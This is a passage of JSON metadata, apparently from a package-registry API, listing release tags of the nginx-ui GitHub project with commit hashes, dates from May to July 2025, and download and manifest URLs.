.1.14","sha":"b1fee47403fed5107ccee8d99a6d2f6c88799edd","kind":"commit","published_at":"2025-07-21T02:17:54.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.14","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.14/manifests"},{"name":"v2.1.13","sha":"0000298cb0019056313b576b0a97051a92973c71","kind":"commit","published_at":"2025-07-20T15:20:27.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.13","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.13/manifests"},{"name":"v2.1.12","sha":"d6ecf1d51b76905b1b240b54971c270b85c85de4","kind":"commit","published_at":"2025-07-04T10:07:21.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.12","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.12/manifests"},{"name":"v2.1.11","sha":"90881af9dd132b3fc4196169305566eb1f8987a2","kind":"commit","published_at":"2025-07-04T09:58:00.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.11","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.11/manifests"},{"name":"v2.1.10","sha":"1cb44abc6ac66167d25e21c783d5844a37eb4ec0","kind":"commit","published_at":"2025-07-04T00:09:00.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.10","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"fa0d785aa0a2d4a78f3af5a1fe231297ad74e1e0","kind":"commit","published_at":"2025-06-26T09:34:50.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.9","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"e4dd130157751f584c5fa978abe75e2bc9ce98c9","kind":"commit","published_at":"2025-06-25T09:25:44.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"42170f5ef3007239ec3d67c21c5c90e6ea4400db","kind":"commit","published_at":"2025-06-24T14:22:24.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"99942cf7137ca2244ebc6db94c10b94d20eec959","kind":"commit","published_at":"2025-06-15T02:29:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"0a7f89a1fca8bdf3c6768244ce10440972e69047","kind":"commit","published_at":"2025-06-11T12:09:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.5/manifests"},{"name":"v2.1.4-patch.1","sha":"ff6535039f507730d76d1b3d38a65cce842ef72f","kind":"commit","published_at":"2025-06-06T03:40:19.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.4-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.4-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.4-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.4-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.4-patch.1/manifests"},{"name":"v2.1.4","sha":"d55fcef9a3debc7437f7c7a5f8dc7860878715ec","kind":"commit","published_at":"2025-06-06T03:30:24.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"6770993b107842645aebf7f2e517529effb6c6f6","kind":"commit","published_at":"2025-06-05T14:04:00.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"e207b51ceca33a162d9a8a1a35cca33c2a76d809","kind":"commit","published_at":"2025-06-04T10:08:44.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"b31365f448c3f5af29599cbf070e083223d17ce9","kind":"commit","published_at":"2025-06-04T04:00:35.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.1/manifests"},{"name":"v2.1.0-patch.1","sha":"f19d6c02410db4927f1779f077724c9a48fe54e0","kind":"commit","published_at":"2025-06-02T01:29:29.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.0-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.0-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.0-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-patch.1/manifests"},{"name":"v2.1.0","sha":"052e47620b28b667001987cf42354fd473ee8627","kind":"commit","published_at":"2025-06-02T00:34:28.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0/manifests"},{"name":"v2.1.0-rc.3","sha":"227a8212ebc1add373e0daaeb0d1173a9a9b0606","kind":"commit","published_at":"2025-05-28T08:57:17.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.0-rc.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-rc.3/manifests"},{"name":"v2.1.0-rc.2","sha":"38ae1ccf640d2f3911679791e15fef9c947300b6","kind":"commit","published_at":"2025-05-28T08:33:51.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.0-rc.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-rc.2/manifests"},{"name":"v2.1.0-rc.1","sha":"b9f033d62f70f0a74406e4e85f3474d5095e6e36","kind":"commit","published_at":"2025-05-28T06:22:18.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.0-rc.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-rc.1/manifests"},{"name":"v2.1.0-beta.1","sha":"bb175db1e09b7d26428f7a385cc5c6536b6744a6","kind":"commit","published_at":"2025-05-28T01:42:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.0-beta.1/manifests"},{"name":"v2.0.2","sha":"6fd77b53eda7eb8cf3f4207989f3e44ae3034931","kind":"commit","published_at":"2025-05-24T05:33:53.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"fe51a8b4d102b65863ee442223cf7a10f80b71da","kind":"commit","published_at":"2025-05-24T01:05:17.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"daee3ac7ade1162805b3af07807e2f4dc2affaf5","kind":"commit","published_at":"2025-05-17T14:05:52.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0/manifests"},{"name":"v2.0.0-rc.8-patch.1","sha":"5b4f97e136604afa8a4b2c66665a1eb53eac37a0","kind":"commit","published_at":"2025-05-13T14:35:02.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.8-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.8-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.8-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.8-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.8-patch.1/manifests"},{"name":"v2.0.0-rc.8","sha":"fb6a0b657aa2cf4948f770fbfc59449e4197c3a5","kind":"commit","published_at":"2025-05-13T13:19:17.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.8/manifests"},{"name":"v2.0.0-rc.7-patch.8","sha":"ab97f9435691423c61aa73876c34528ac460d98e","kind":"commit","published_at":"2025-05-13T08:26:25.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.8/manifests"},{"name":"v2.0.0-rc.7-patch.7","sha":"ab97f9435691423c61aa73876c34528ac460d98e","kind":"commit","published_at":"2025-05-13T08:26:25.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.7/manifests"},{"name":"v2.0.0-rc.7-patch.6","sha":"ab97f9435691423c61aa73876c34528ac460d98e","kind":"commit","published_at":"2025-05-13T08:26:25.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.6/manifests"},{"name":"v2.0.0-rc.7-patch.5","sha":"5da4136fcd37712c3cce247f3ee5f3e03fbfeb8d","kind":"commit","published_at":"2025-05-13T04:10:33.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.5/manifests"},{"name":"v2.0.0-rc.7-patch.4","sha":"03c3b38f36dc963ef6dbc8ee6dc27e1839c10e8c","kind":"commit","published_at":"2025-05-13T00:49:13.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.4/manifests"},{"name":"v2.0.0-rc.7-patch.3","sha":"f36a2105d50ee3ec535633dc3bd4193442545330","kind":"commit","published_at":"2025-05-12T13:24:03.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.3/manifests"},{"name":"v2.0.0-rc.7-patch.2","sha":"fa02b6a266b64b3ac5be7f963e1799c313e55614","kind":"commit","published_at":"2025-05-12T05:43:36.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.2/manifests"},{"name":"v2.0.0-rc.7-patch.1","sha":"da2d46886e2f8592c5f8b621a361fbf55a8415b6","kind":"commit","published_at":"2025-05-12T05:30:21.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7-patch.1/manifests"},{"name":"v2.0.0-rc.7","sha":"af84b85b349638f9bd06669a45e757d19664b050","kind":"commit","published_at":"2025-05-11T13:24:42.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.7/manifests"},{"name":"v2.0.0-rc.6-patch.5","sha":"635b2c272b4a2432660e3393e937a499e374c47f","kind":"commit","published_at":"2025-05-08T02:10:26.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.6-patch.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.6-patch.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.6-patch.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.5/manifests"},{"name":"v2.0.0-rc.6-patch.4","sha":"0f09a0b03c0d928e2371fbcf80e48c4dad651542","kind":"commit","published_at":"2025-05-07T10:00:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.6-patch.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.6-patch.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.6-patch.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.4/manifests"},{"name":"v2.0.0-rc.6-patch.3","sha":"c5274a7a64bf4c2308d0a2ebf552fcc6a3d2af58","kind":"commit","published_at":"2025-05-07T09:06:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.6-patch.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.6-patch.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.6-patch.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.3/manifests"},{"name":"v2.0.0-rc.6-patch.2","sha":"fbc800ff22c4e128c87e5422691bc8f125b2de3a","kind":"commit","published_at":"2025-05-07T07:36:18.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.6-patch.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.6-patch.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.6-patch.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.2/manifests"},{"name":"v2.0.0-rc.6-patch.1","sha":"3461ad3c248352c372add43e2a20b607d0e75a79","kind":"commit","published_at":"2025-05-07T00:14:13.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.6-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.6-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.6-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6-patch.1/manifests"},{"name":"v2.0.0-rc.6","sha":"1330888280a244552402accf7b26abab6c2dcb9a","kind":"commit","published_at":"2025-05-06T15:42:22.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.0.0-rc.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.0.0-rc.6/manifests"},{